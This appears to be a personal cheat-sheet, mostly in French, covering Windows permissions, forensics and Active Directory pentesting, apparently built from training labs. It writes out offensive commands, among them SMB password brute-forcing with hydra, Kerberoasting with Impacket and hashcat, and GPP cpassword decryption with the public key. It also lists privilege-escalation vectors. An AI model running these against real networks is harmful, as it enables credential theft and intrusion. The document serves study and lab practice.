Windows
In case of doubt, reboot, Rowan Atkinson
Principes
Permissions
Pour check/set les permissions :
icacls <dossier>
# I - permission inherited from the parent container
# F - full access (full control)
# M - modify right/access
# OI - object inherit
# IO - inherit only
# CI - container inherit
# RX - read and execute
# AD - append data (add subdirectories)
# WD - write data and add files
GPO
Mettre Γ jour les GPO :
gpupdate /force
Privileges
On a typical Windows server, you may find several different account types :
- Domain Administrators : This is typically the highest account level you will find in an enterprise along with Enterprise Administrators. An account with this level of privilege can manage all accounts of the organization, their access levels, and almost anything you can think of.
- Services : Accounts used by software to perform their tasks such as back-ups or antivirus scans.
- Domain users : Accounts typically used by employees. These should have just enough privileges to do their daily jobs. For example, a system administrator may restrict a user's ability to install and uninstall software.
- Local accounts : These accounts are only valid on the local system and can not be used over the domain.
Windows Privilege Escalation Vectors
A few common vectors that could allow any user to increase their privilege levels on a Windows system :
- Stored Credentials : Important credentials can be saved in files by the user or in the configuration file of an application installed on the target system.
- Windows Kernel Exploit : The Windows operating system installed on the target system can have a known vulnerability that can be exploited to increase privilege levels.
- Insecure File/Folder Permissions : In some situations, even a low privileged user can have read or write privileges over files and folders that can contain sensitive information.
- Insecure Service Permissions : Similar to permissions over sensitive files and folders, low privileged users may have rights over services. These can be somewhat harmless such as querying the service status (SERVICE_QUERY_STATUS) or more interesting rights such as starting and stopping a service (SERVICE_START and SERVICE_STOP, respectively).
- DLL Hijacking : Applications use DLL files to support their execution. You can think of these as smaller applications that can be launched by the main application. Sometimes DLLs that are deleted or not present on the system are called by the application. This error doesn't always result in a failure of the application, and the application can still run. Finding a DLL the application is looking for in a location we can write to can help us create a malicious DLL file that will be run by the application. In such a case, the malicious DLL will run with the main application's privilege level. If the application has a higher privilege level than our current user, this could allow us to launch a shell with a higher privilege level.
- Unquoted Service Path : If the executable path of a service contains a space and is not enclosed within quotes, a hacker could introduce their own malicious executables to run instead of the intended executable.
- Always Install Elevated : Windows applications can be installed using Windows Installer (also known as MSI packages) files. These files make the installation process easy and straightforward. Windows systems can be configured with the "AlwaysInstallElevated" policy. This allows the installation process to run with administrator privileges without requiring the user to have these privileges. This feature allows users to install software that may need higher privileges without having this privilege level. If "AlwaysInstallElevated" is configured, a malicious executable packaged as an MSI file could be run to obtain a higher privilege level.
- Other software : Software, applications, or scripts installed on the target machine may also provide privilege escalation vectors.
Initial Information Gathering
A few key points in enumeration :
- Users on the target system : The
net userscommand will list users on the target system. - OS version : The
systeminfo | findstr /B /C: "OS Name"/C: "OS Version"command will output information about the operating system. This should be used to do further research on whether a privilege escalation vulnerability exists for this version. - Installed services : the
wmic service listcommand will list services installed on the target system.
Forensic
Ruches de registre
https://tryhackme.com/room/windowsforensics1
Les fichiers intΓ©rΓ©ssants sont :
C
βββ Users
β βββ Administrator
β β βββ AppData
β β β βββ Local
β β β βββ Microsoft
β β β βββ Windows
β β β βββ UsrClass.dat
β β β βββ UsrClass.dat.LOG1
β β β βββ UsrClass.dat.LOG2
β β βββ NTUSER.DAT
β β βββ ntuser.dat.LOG1
β β βββ ntuser.dat.LOG2
β βββ arthur
β βββ AppData
β β βββ Local
β β βββ Microsoft
β β βββ Windows
β β βββ UsrClass.dat
β β βββ UsrClass.dat.LOG1
β β βββ UsrClass.dat.LOG2
β βββ NTUSER.DAT
β βββ ntuser.dat.LOG1
β βββ ntuser.dat.LOG2
βββ Windows
βββ appcompat
β βββ Programs
β βββ Amcache.hve
β βββ Amcache.hve.LOG1
β βββ Amcache.hve.LOG2
βββ System32
βββ config
βββ RegBack
β βββ DEFAULT
β βββ SAM
β βββ SECURITY
β βββ SOFTWARE
β βββ SYSTEM
βββ DEFAULT
βββ DEFAULT.LOG1
βββ DEFAULT.LOG2
βββ SAM
βββ SAM.LOG1
βββ SAM.LOG2
βββ SECURITY
βββ SECURITY.LOG1
βββ SECURITY.LOG2
βββ SOFTWARE
βββ SOFTWARE.LOG1
βββ SOFTWARE.LOG2
βββ SYSTEM
βββ SYSTEM.LOG1
βββ SYSTEM.LOG2
17 directories, 35 files
Les fichiers .LOG sont les journaux de modification des ruches de registre. Il contiennent des donnΓ©es plus rΓ©centes et sont donc Γ considΓ©rer. Zimmerman's Registry Explorer permet de les prendre en compte lors de la lecture.
MFT
Parser une MFT et la lire :
.\MFTECmd.exe -f 'C:\users\THM-4n6\Desktop\triage\C\$MFT' --csv parsed-mft.csv
.\MFTECmd.exe -f 'C:\users\THM-4n6\Desktop\triage\C\$BOOT' --csv parsed-mft.csv
EZviewer pour regarder les csv.
PowerShell
# chronomΓ©trer une commande
Measure-Command {cmd}
# afficher en arborescence
tree /f
# lien symbolique
new-item -itemtype symboliclink -path . -name settings.json -value "C:\Users\Kamil\OneDrive\Windows Terminal\settings.json"
# Hash
Get-FileHash filename -Algorithm MD5|SHA256|SHA512
CertUtil -hashfile filename MD5|SHA256|SHA512
Mots de passe
Pour se connecter en local et pas sur le domaine : .\username
Bruteforce sur le rΓ©seau (pas du tout discret) :
hydra -L usernames.txt -P rockyou.txt 192.168.10.1 smb
Mot de passe dans SYSVOL
Pour dΓ©chiffrer le cpassword d'un compte dΓ©fini dans une GPO sur un partage :
- utiliser la recette CyberChef
- ou gpp-decrypt si besoin offline
ClΓ© AES256 donnΓ©e par Microsoft :
# AES256 cipher key
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
# Initialisation Vector
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source : https://adsecurity.org/?p=2288
Kerberoast
Avec Impacket :
python3 ./GetUserSPNs.py -request -dc-ip 192.168.10.1 MIDGAR.LAN/scarlet:password -outputfile kerberoast.hash
Pour casser ces hash :
hashcat -m 13100 -a 0 kerberoast.hash rockyou.txt -o output.txt
Partage
Pour rΓ©cupΓ©rer tous les fichiers d'un partage, et les Γ©tudier en local :
smb: \> recurse
smb: \> prompt
smb: \> mget *
Liens utiles
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html
Pentesting Active Directory mindmap :
